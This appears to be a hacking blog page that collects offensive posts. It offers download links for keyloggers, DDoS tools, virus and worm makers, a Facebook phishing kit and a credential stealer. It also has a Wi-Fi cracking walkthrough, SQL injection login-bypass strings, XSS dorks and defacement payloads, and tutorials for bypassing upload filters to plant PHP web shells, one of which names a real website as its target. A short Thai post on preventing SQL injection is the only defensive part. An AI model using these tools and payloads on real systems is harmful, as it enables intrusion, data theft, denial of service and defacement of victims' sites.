WHO R U

สถิติเว็บไซต์


Free Web Site Counter
DSL Services

Flag Counter

บทความที่ได้รับความนิยม

My Motto

Translate

Label

HOT HACKING TOOLS

comments
HOT HACKING TOOLS

OUBAf [Hot] HACKING TOOLS FOR ALL [Hot] 


Hello everybody!
(I'm very sorry if some of them has virus warnings )

~TABLE OF CONTENTS~
1. Keylogger's
2. DDoS Tools
3. Deface/SQL
4.Virus Makers + Codes
5.Other Tools

Let's get started!

1. Keyloggers

-Project Neptune v2.0 http://project-neptune.net/download/

-Refrog Keylogger https://www.refog.com/download.html

-Rinlogger http://www.mediafire.com/?p5al7gnhfd020a5

-Emissary Keylogger http://www.mediafire.com/?y9mu87av2t3q2ia


2. DDoS Tools

-Anonymous DoSer http://www.mediafire.com/?rrbmmms8c62jymr

- Anonymous External Attack http://www.mediafire.com/?49imnv3wh5fa4b5

-ByteDOS v3.2 http://www.mediafire.com/?ecbjw425kl4xtoj

-Hoic Vercion v2.1 http://www.mediafire.com/?q7jzd7z991z7k82

-LOIC http://www.mediafire.com/?79b5xqa10ddcnro

-PoWeRFuL DoSeR http://www.mediafire.com/?04q00er3z54kmzr

-Jays Booter http://www.mediafire.com/?q5ba9kb0cwuu5c5

-Site_Hog_v1_Release http://www.mediafire.com/?m9627jc0v2i12vd

-SYN-Flood-DOS http://www.mediafire.com/?jzax9kg4dhn1y6v

-Turbinas VolkSv1 http://www.mediafire.com/?af5f3fezzcxaabn

-rDos + Port Scanner http://www.mediafire.com/?juvcot3l11llt1x

-GoodBye v3.0 http://www.mediafire.com/?zyam8r9i05qb3kc

-Unicorn Booter (Download Link Available Soon)

-Joker IP Reserve Tool http://www.mediafire.com/?48vkvi3cgns5pa8


3. Deface Tools/SQL

-RootKit http://www.mediafire.com/?iqrx57822ja4cbu

- Horny Monkey (Deface Maker) http://www.mediafire.com/?w0h8009g85zruaw

-xcvDefaceMaker http://www.mediafire.com/?u16ocimrui33aad

-xMid Deface Creator http://www.mediafire.com/?kmylctplymhl1g1

-Havij(SQL) http://www.mediafire.com/?637zfm7uwhfoobc

-Advanced Deface Page Maker http://www.mediafire.com/?it2dcbbulwkjoxh

4. Virus Makers + Codes

-Virus-o-Matic http://www.mediafire.com/?vwh3t11vglq6jl0

-TeraVirus Maker http://www.mediafire.com/?9i7anih34gw8mi4

-Nick's Deadly Worm Maker v2.1 (I made it Big Grin)http://www.mediafire.com/?rg6026d980d6s4q

-12 VIRUS CODES (Download Link Available Soon)


5. Other Tools

-BrutusA2 (Password Cracker) http://www.mediafire.com/?1ljbsyxzavdbxys

-Facebook Phishing Site http://www.mediafire.com/?36mcwd5r7waj3mi

-iStealer_1.6_Legends http://www.mediafire.com/?4vwaaofchw89msh

-Resource Hacker (Change .exe Icons) http://www.mediafire.com/?as1fhbecq3w5t04

-Cheat Engine (Hack Flash Games) http://www.mediafire.com/?cq0r3acmxxo36o6

-Facebook FreezerForeever http://www.mediafire.com/?qqn1u1vd8nobl3m

-HackStars Spammer V.2 http://www.mediafire.com/?qg48x8x8cwqc2p3

-Star Crypter v1.2 (Download Link Available Soon)

-Hackers Colour Changer (CHANGE COLOUR IN ANYTHING ON YOUR COMPUTER)
http://www.mediafire.com/?k5cfu1pl457ma9g

-Advanded .BAT TO .EXE CONVERTER http://www.mediafire.com/?b5g5evj46d1dj4d

BlackUbuntu 12.04 V5:

comments
BlackUbuntu 12.04 V5:

                                       
           

Mirror:
  Grab Download Links

BlackUbuntu 12.04 V5 


When you start BlackUbuntu:
1) Type y for Yes for start vnc and ssh.
2) Next type in your resolution (For the S3 its 1280x720 than enter)
3) Click y and enter again to save settings.

This should only have to be done once to set up your device to BlackUbuntu.


_______________
Change logs:
_______________

Fixed:
Lsusb
Wicd Start up error (At Start of BlackUbuntu)
Updated iw
Few minor tweaks.

If you want to sniff networks use:

Droidsniff: http://www.mediafire.com/?c3mr5lx34kpmp97
FaceNiff: http://www.mediafire.com/?m42c3ixlyowqdfr

Screenshot:

_______________________________________________________________

Hide Data Behind Images

comments

Hide Data Behind Images



In this article we will see how to hide data behind images without using softwares.

Step1: Create a folder in your C drive and name it as “hack”

Step 2:Copy all the images you want to hide and also the image behind which you want hide into this directory.

Step 3: Now select the images you want to hide and add them to archive i.e keep them in winrar.
You can do this by right clicking the selected images->add to archive->click ok.


Now you will see one more file named “hack.rar” in your directory.


Step 4: now open command prompt and change your root to your current directory as shown in the figure and type the following command.
Copy /b 1.jpg + hack.rar romance.jpg


Here “1.jpg “ is the image behind which you want to hide.
“hack.rar” is the file of images to be hidden.
“romance.jpg “ is the output file that we want.
After executing the following command, we will see an extra image called “romance.jpg” as shown in the figure.


Now you can delete all the files except “romance.jpg”.
If you double click the file, it opens a normal image. But you can see the hidden files by opening the file with winrar.



Hope you liked this. In my next article i will show you a demonstration using a tool.
If you have any doubts or suggestions,leave a comment.

Hacking Wifi From Windows

comments

Hacking Wifi From Windows

If you are living nearby someones WiFi hotspot and every time your laptop search for connection its showing up but you don't have passwords. Or you just want to steal someones WPA/WPA2 Wi-Fi hotspot key or passwords. Don't worry... 
In this tutorial I’ll show How to hack a WPA/WPA2 Wi-Ficonnection through a bootable USB.
Things you should need:

1. A USB pen drive.
2. beini.iso file. [Download it from HERE].

3. UNetbootin software to make your USB drive bootable. [Download for WindowsLinux or Mac]
Some few steps you should to do ( WEP):
1. Write beini.iso on your USB by UNetbootin. Set everything according to this image bellow.

Easy Way to Hack WEP/WPA/WPA2 Wi-Fi Password,wifi hacking,Easy Way to Hack WEP/WPA/WPA2 Wi-Fi Password.pdf,Easy Way to Hack WEP/WPA/WPA2 Wi-Fi Password pdf book,how to Hack WEP/WPA/WPA2 Wi-Fi Password
2. After finishing restart your PC and boot it from your USB.

3. If you were successful to boot up then you should see something like this. Click Minidwep-gtk.
WiFi Hacking2
4. Click OK.
Easy Way to Hack WEP/WPA/WPA2 Wi-Fi Password,wifi hacking,Easy Way to Hack WEP/WPA/WPA2 Wi-Fi Password.pdf,Easy Way to Hack WEP/WPA/WPA2 Wi-Fi Password pdf book,how to Hack WEP/WPA/WPA2 Wi-Fi Password
5. Now Minipwep-gtk  program will open. Click Scan.
Easy Way to Hack WEP/WPA/WPA2 Wi-Fi Password,wifi hacking,Easy Way to Hack WEP/WPA/WPA2 Wi-Fi Password.pdf,Easy Way to Hack WEP/WPA/WPA2 Wi-Fi Password pdf book,how to Hack WEP/WPA/WPA2 Wi-Fi Password
6. Select a wireless network(should have Clint) from the list. And click Lunch to start creaking process.
Easy Way to Hack WEP/WPA/WPA2 Wi-Fi Password,wifi hacking,Easy Way to Hack WEP/WPA/WPA2 Wi-Fi Password.pdf,Easy Way to Hack WEP/WPA/WPA2 Wi-Fi Password pdf book,how to Hack WEP/WPA/WPA2 Wi-Fi Password
7. Sometimes its take a while according to your victim connections IVS value and password strength. So keep passions.
Easy Way to Hack WEP/WPA/WPA2 Wi-Fi Password,wifi hacking,Easy Way to Hack WEP/WPA/WPA2 Wi-Fi Password.pdf,Easy Way to Hack WEP/WPA/WPA2 Wi-Fi Password pdf book,how to Hack WEP/WPA/WPA2 Wi-Fi Password
8. If it found a password, it should appear like this.
Easy Way to Hack WEP/WPA/WPA2 Wi-Fi Password,wifi hacking,Easy Way to Hack WEP/WPA/WPA2 Wi-Fi Password.pdf,Easy Way to Hack WEP/WPA/WPA2 Wi-Fi Password pdf book,how to Hack WEP/WPA/WPA2 Wi-Fi Password

To creak WPA/WPA2 follow this image instruction.

Easy Way to Hack WEP/WPA/WPA2 Wi-Fi Password,wifi hacking,Easy Way to Hack WEP/WPA/WPA2 Wi-Fi Password.pdf,Easy Way to Hack WEP/WPA/WPA2 Wi-Fi Password pdf book,how to Hack WEP/WPA/WPA2 Wi-Fi Password
Let me know if you have done it successfully or you have any complicity

PremiumLink-Converter by B2H

comments ข้อมูลสรุปนี้ไม่พร้อมใช้งาน โปรด คลิกที่นี่เพื่อดูโพสต์

Havij v1.17 Pro Cracked

comments


Havij 1.17 released

We are glad to finally announce the long-awaited release of version 1.17 of Havij Advanced SQL Injection tool.
This version is equipped with enhanced stealth and evasion techniques (including the new randomized signature generator) which allow covert attacks with support for circumvention of many major web application firewalls. The new Write File feature allows you to create an arbitrary file on the server if the database user has the required permissions. The last but not least is the Dump All feature, which relieves you of the burden of having to retrieve and save each table individually; using Dump All, you can, retrieve all the [accessible] databases on the server and save them with a single action. All the new features and changes introduced in this release are as below:
• Dump all
• New bypass method for MySQL using parenthesis
• Write file feature added for MSSQL and MySQL.
• Loading HTML form inputs
• Random signature generator
• Saving data in CSV format
• Advanced evasion tab in the settings
• Injection tab in settings
• 'Non-existent injection value' can now be changed by user (the default value is 999999.9)
• 'Comment mark' can be changed by user (the default value is --)
• Disabling/enabling of logging
• Bugfix: adding manual database in tables tree view
• Bugfix: finding string columns in PostgreSQL
• Bugfix: MS Access blind string type data extraction
• Bugfix: MSSQL blind auto detection when error-based method fails
• Bugfix: all database blind methods fail on retry
• Bugfix: guessing columns/tables in MySQL time-based injection
• Bugfix: crashing when dumping into file
• Bugfix: loading project injection type (Integer or String)
• Bugfix: HTTPS multi-threading bug
• Bugfix: command execution in MSSQL 2005




DOWLOAD

DOWLOAD(mirror)

Bypass login with SQLi Strings

comments
Bypass login with SQLi Strings
What is SQL Injection ?

SQL Injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an Application.

What is SQL Injection Bypass login ?
Basically, this is one of the most easiest way to exploit the SQL Injection Vulnerability. I hope HW readers you might know about SQL Injection and here we are talking about Bypass login using SQL Injection strings. While defacing a Website using SQL Injection attack there is a database of that website which stores login ID and passwords, and if the website is vulnerable to SQL Injection attack then an attacker will try to get admin password using SQL Injection Bypass login. An attacker will insert SQL String in website login form in order to bypass login and Exploit the Vulnerability.

How to Bypass login using SQL String ?

Requirements :-
SQL Injection Vulnerable website.
SQL Injection Strings code sheet.
Brain.

So, I'm using a vulnerable website to show a tutorial on SQL Injection string code attack to bypass login.

Suppose, we have to bypass login on a website and Enter's into Admin and access website.

For E.g This is the real ID and Password of victim website and it is vulnerable to SQL Injection Attack

Name = Admin
Password = pass123

Now go to that website login page and Enter this string as follow below
Name = ' or 1=1--
Password = ' or 1=1--

After all click on login and you will be in Admin!

[Image: 09kPaCK.jpg]


' or '1'='1
' or 'x'='x
' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --
'or'1=1'

7000 Google Dork List

XSS Dorks (Useful)

comments
XSS Dorks (Useful)
Hi, there are some XSS Dorks to found some XSS Vuln sites, copy paste one of the dorks and paste that on google search box!



inurl:".php?cmd="
inurl:".php?z="
inurl:".php?q="
inurl:".php?search="
inurl:".php?query="
inurl:".php?searchstring="
inurl:".php?keyword="
inurl:".php?file="
inurl:".php?years="
inurl:".php?txt="
inurl:".php?tag="
inurl:".php?max="
inurl:".php?from="
inurl:".php?author="
inurl:".php?pass="
inurl:".php?feedback="
inurl:".php?mail="
inurl:".php?cat="
inurl:".php?vote="
inurl:search.php?q=
inurl:com_feedpostold/feedpost.php?url=
inurl:scrapbook.php?id=
inurl:headersearch.php?sid=
inurl:/poll/default.asp?catid=
inurl:/search_results.php?search= 




Some Strigns to test if is vuln of XSS or not!

#1 Add a text format H1.
<h1>XSS Vuln by aLbTuX</h1>

#2 PopUp Box
<script>alert("aLbTuX")</script>

#3 Deface the website with iframe
<iframe src="URL_HERE" height=768 width=1024>

#4 Or just adding your logo of hack or any photo on website
<img src="url here" />

Bypassing security and validations to upload shells

comments
Bypassing security and validations to upload shells
These are some of the ways you can upload shells successfully..

a) Normal Implementation 
    In this Implementation the upload.php does not check the file and directly performs the upload as shown in below code

        
   $uploaddir = 'uploads/'; // Relative path under webroot
        $uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
   if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) 
       {
          echo "File is valid, and was successfully uploaded.\n";
   } 
   else 
   {
          echo "File uploading failed.\n";
   }
     ?>
     Now In the above code we see that the code directly upload the file to the directory .
 Hence we can directly upload a Webshell and excecutes its as

   http:///uploads/webshell.php
  or
  curl http:///uploads/webshell.php

b) Content Type Verification 
   In this type of Implementation the code in upload.php checks for the type of the file that is being uploaded if it contents plain text or PHP it will not upload it

  Consider the below code



      //checks if file is Gif or not 
       if($_FILES['userfile']['type'] != "image/gif")  
       {
          echo "Sorry, we only allow uploading GIF images";
          exit;
       }
      $uploaddir = 'uploads/';
      $uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
      if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) 
   {
          echo "File is valid, and was successfully uploaded.\n";
   } 
   else
    {
          echo "File uploading failed.\n";
    }
   ?>

The above code will check if the content/MIME Type of the file is Gif or not

Now if the files having content/Header other than the GIf is uploaded then the HTTP Request is as shown

"
   POST /upload2.php HTTP/1.1
   TE: deflate,gzip;q=0.3
   Connection: TE, close
   Host: localhost
   User-Agent: libwww-perl/5.803
   Content-Type: multipart/form-data; boundary=xYzZY
   Content-Length: 156
   --xYzZY
   Content-Disposition: form-data; name="userfile"; filename="shell.php"
   Content-Type: text/plain

"

The code will check the highlighted portion and see that its not Gif image and will not upload it

Now We can Bypass this protection by implicitly setting the content type either by Program like perl or by the Form Data tamper plugin in firefox
Eg
     "Content-Type" =>"image/gif"
This will make the upload.php script happily accept the file and u can access it as
  
   http:///uploads/webshell.php
  or
  curl http:///uploads/webshell.php


C) Image File Content Verification
    In this Type of Verification the developer might decide to verify the content of the uploaded file to check if it has a script or not
   Consider the below example


 $imageinfo = getimagesize($_FILES['userfile']['tmp_name']); //check image size
if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg') 
{
    echo "Sorry, we only accept GIF and JPEG images\n";
    exit;
}
$uploaddir = 'uploads/';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
    echo "File is valid, and was successfully uploaded.\n";
} else {
    echo "File uploading failed.\n";
}
?>

       In above Example the php functions getImageSize returns the size and type  of the image checks if the file is valid image file .

Now to Bypass this type of verification we can use a program like GIMP to embedded a php script inside the Image File Binary data .
   when the getimagesize()  looks at the file it sees a valid image file but when a php interpreter sees at the file it sees it as a php code and executes the php code in it along with binary data
   Hence even if we change the extension of the shell to php and if File name verification is not there then the file would be uploaded as a valid GI or JPEG image

hence

   http:///uploads.webshell.gif
  will show a proper image file (even if the code is embedded in it)
and
      http:///uploads/webshell.php
Will show the shell (it is uploaded as a php file only )


 D) File Name Verification 

   SomeTimes the Developer decides to check the extensions of the uploaded file to decide if the file is Image or not as shown in the following code


   $blacklist = array(".php", ".phtml", ".php3", ".php4");
   foreach ($blacklist as $item) 
    {
         if(preg_match("/$item\$/i", $_FILES['userfile']['name'])) 
       {
              echo "We do not allow uploading PHP files\n";
              exit;
          }
    }
   $uploaddir = 'uploads/';
   $uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
   if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
           echo "File is valid, and was successfully uploaded.\n";
   } 
   else 
   {
           echo "File uploading failed.\n";
   }
?>

In the Above Code
The variable $blacklist contains the extensions to be checked for uploaded file
 The function pregmatch Checks the name of the uploaded file to see if it contains any of the blacklisted extensions if the blocked extension is not ther in the uploaded file name then the file is uploaded else a error msg is displayed .
  Now the Above code can also be bypass by uploading the .Gif or .jpeg file with a php Code embedded in it as shown in step C if the webserver is not configure correctly (which is the case in most of the cases ) then the GIf file is also passed to the PHP Interpreter which Executes the PHP code within it .

   Another way of bypassing this Method is of Using Null Byte Parameter

Change the File Name to Shell.php.gif
  Now if above file is uploaded the uploded function will check the extention of the file as .gif and allow it to be process .

But while uploding as the file contains a nullByte Character () it will ignore everything which is after and save the file as shell.php

u can access the file as
   http:///uploads/Shell.php

The above hack is possible because in  native code, the length of a string is determined by the position of the first null byte from the start of the string - the null byte effectively terminates the string.

Hope This Article was self sufficient .

Source: Many hacking forums, Blogs and Google

วิธีการป้องกันช่องโหว่ Sql injection

comments


วิธีการป้องกันช่องโหว่ Sql injection

วิธีการป้องกันช่องโหว่ Sql injection

วิธีการป้องกัน


SQL Injection
คือ การที่ในเวปมีการรับข้อมูลจากผู้ใช้ แล้วนำไปใช้ในการสั่งให้ฐานข้อมูลทำงาน แล้ว ผู้ใช้พยายามที่จะหลอกโปรแกรมให้ทำงานนอกเหนือจากที่เราต้องการ หรือ หลอกให้โปรแกรมทำงานโดยผ่านการตรวจสอบเงื่อนไขบางอย่าง
Injection Flaws
หมายถึง แฮกเกอร์สามารถที่จะแทรก Malicious Code หรือ คำสั่งที่แฮกเกอร์ใช้ในการเจาะระบบส่งผ่าน Web Application ไปยังระบบภายนอกที่เราเชื่อมต่ออยู่ เช่น ระบบฐานข้อมูล SQL โดยวิธี SQL Injection หรือ เรียก External Program ผ่าน shell command ของระบบปฎิบัติการ เป็นต้น
ส่วนใหญ่แล้วแฮกเกอร์จะใช้วิธีนี้ในช่วงการทำ Authentication หรือการ Login เข้าระบบผ่านทาง Web Application เช่น Web Site บางแห่งชอบใช้ “/admin” ในการเข้าสู่หน้า Admin ของ ระบบ ซึ่งเป็นช่องโหว่ให้แฮกเกอร์สามารถเดาได้เลยว่า เราใช้  http://www.mycompany.com/admin  ในการเข้าไปจัดการบริหาร Web Site ดังนั้นเราจึงควรเปลี่ยนเป็นคำอื่นที่ไม่ใช่ “/admin” ก็จะช่วยได้มาก
วิธีการทำ SQL injection
ก็คือ แฮกเกอร์จะใส่ชื่อ username อะไรก็ได้แต่ password สำหรับการทำ SQL injection จะใส่เป็น Logic Statement ยกตัวอย่างเช่น ‘ or ’1′ = ’1 หรือ ” or “1″= “1 หรือ a’ or 1=1–
Query = “SELECT * FROM product WHERE Password=’$input’”;
แต่ผู้ใช้ทำการใส่ ข้อมูลเป็น a’ or 1=1–
ดังนั้น query ที่ได้จะเป้น
Query = “SELECT * FROM product WHERE Password=’a’ or 1=1–’”;
จะเห็นว่าเมื่อนำไช้งานแล้ว จะสามารถเรียกดูข้อมูลได้เสมอ เนื่องจาก 1=1 เป็นจริง
สมมุติว่า มีโค้ดต่อไปนี้ใน application และ parameter “userName” ซึ่งประกอบด้วย
ชื่อผู้ใช้ ช่องโหว่แบบ SQL Injection เกิดขึ้นในโค้ดนี้:
statement := “SELECT * FROM users WHERE name = ‘” + userName + “‘;”
ถ้าป้อน “a’; DROP TABLE users; SELECT * FROM data WHERE name LIKE ‘%”
เข้าไปในส่วน “userName” จะทำให้เกิด SQL statement ต่อไปนี้
SELECT * FROM users WHERE name = ‘a’; DROP TABLE users; SELECT * FROM data WHERE name LIKE ‘%’;
ฐานข้อมูลจะเอ็กซิคิวท์ statement ตามลำดับ คือ select data, drop user table
และ select data ทำให้ผู้ใช้เว็ปสามารถดูหรือแก้ไขข้อมูลใด ๆ ที่อยู่ในฐานข้อมูล
ที่ผู้ใช้ที่เชื่อมโยงกับฐานข้อมูลสามารถอ่าน หรือแก้ไขได้
วิธีการป้องกัน
นักพัฒนาระบบ (Web Application Developer) ควรจะระมัดระวัง input string ที่มาจากทางฝั่ง Client (Web Browser) และไม่ควรใช้วิธีติดต่อกับระบบภายนอกโดยไม่จำเป็น
ควรมีการ “กรอง” ข้อมูลขาเข้าที่มาจาก Web Browser ผ่านมาทางผู้ใช้ Client อย่างละเอียด และ ทำการ “กรอง” ข้อมูลที่มีลักษณะที่เป็น SQL injection statement ออกไปเสียก่อนที่จะส่งให้กับระบบฐานข้อมูล SQL ต่อไป
การใช้ Stored Procedure หรือ Trigger ก็เป็นทางออกหนึ่งในการเขียนโปรแกรมสั่งงานไปยังระบบฐานข้อมูล SQL ซึ่งมีความปลอดภัยมากกว่าการใช้ “Dynamic SQL Statement ” กับฐานข้อมูล SQL ตรงๆ
ช่องโหว่แบบ SQL Injection สามารถแก้ไขได้ใน programming language ส่วนใหญ่
ในภาษา Java ควรมีการใช้ PreparedStatement class
แทนที่จะใช้
Connection con = (acquire Connection)
Statement stmt = con.createStatement();
ResultSet rset = stmt.executeQuery(“SELECT * FROM users WHERE name = ‘” + userName + “‘;”);
ให้ใช้โค้ดต่อไปนี้แทน
Connection con = (acquire Connection)
PreparedStatement pstmt = con.prepareStatement(“SELECT * FROM users WHERE name = ?”);
pstmt.setString(1, userName);
ResultSet rset = stmt.executeQuery();

เครดิต http://www.mycools.in.th

Shell Uploading

comments




Many times you get login of a website, but you are unable to upload your PHP shell !
Today i'll show you how to upload your PHP shell through Tamper Data an Firefox Add-on

Install Tamper Data firefox add-on:
Download Tamper Data here
Now Install it and Restart Firefox

Rename shell:
Note: You have to rename you .php shell to .jpg to bypass the website's security
To upload a shell, of-course you needed a upload option in login page or anywhere !

Demo:
As an example i'll take - http://freead1.net/post-free-ad-to-USA-42

It is a free classified ads posting website, so i got a upload option there !
Find your upload option click on browse, locate you .jpg shell and select it !






Now click on Tools in Firefox Menu bar and Select Tamper Data, Tamper Data plugin will open in a new window !




Before Clicking on Upload button click on "Start Tamper" in Tamper Data window..
Note: Before Clicking on "Start Tamper" close every extra tab you have opened.. If you want this tutorial to be open... Just open it in another browser

Now click on upload button !

After clicking on upload button "Tamper with request?" window will appear !
Click on "Tamper" button




After a click on "Tamper" you will see "Tamper Popup"
In Tamper Popup Window, Copy "POST_DATA" text in Notepad

a



After Copying it to Notepad... "Find yourshell.jpg" and rename it to .php.


Now copy Notepad's text back to "POST_DATA" field..and click OK

It will Upload the shell as .php and you can execute it easily !
Find your .php shell & do whatever you wanted with that website
that's all !

Thank you for reading..